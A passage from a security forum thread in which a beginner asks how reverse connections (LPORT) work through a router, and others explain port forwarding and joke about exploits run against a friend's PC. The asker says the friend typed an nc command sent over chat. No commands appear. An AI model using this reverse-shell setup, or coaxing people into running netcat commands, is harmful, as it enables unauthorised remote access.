      In this case the LPORT will be your router’s port and the reverse connection will try to connect to your router. You have to forward port to make a reverse connection to your ip.

      because i think that all Lan ips should have port 80 open and allowed for incoming traffic from outside

      Port 80 is used by web servers. If you don’t have a web server in your network you don’t need to allow incoming port 80. Ports from 1 to 1023 are used for well known services. Ports above 1023 are used by your client programs and are randomly selected.
      So when you connect to a website your browser chooses a random port above 1023 and connects to port 80 of the website’s webserver.
      Your router should have all incoming ports blocked unless explicitly opened by you.

      second question what if i opened port and forwarded it to my local ip

      and i did the same port to another ip !! ?

      what should be happen ?

      You can not forward same port to multiple computers.

    • #31362
      rebrov
      Participant

      thanks alot buddy i fully understanded

    • #31363
      Xen
      Participant

      I wonder with all those exploits and scans that you’re shooting, what’s the state of your friend’s computer ;D

    • #31364
      morpheus063
      Participant

      The friends computer is behind a router over which he is not having direct access (I presume). However, think about the status of his router status after all these “confused port-forwarding”  😉

    • #31365
      rebrov
      Participant

      @Manu Zacharia (-M-) wrote:

      The friends computer is behind a router over which he is not having direct access (I presume). However, think about the status of his router status after all these “confused port-forwarding”  😉

      ooh no when i said i tried this and test it on my friend pc my friend let me do this he accepted the nc on chatting easy and opened it he even typed the command i told him to

      but to make port forward i can’t since the router is mine to open thats why i can’t make it work dun have access to the router that im associated to 😀

Viewing 37 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?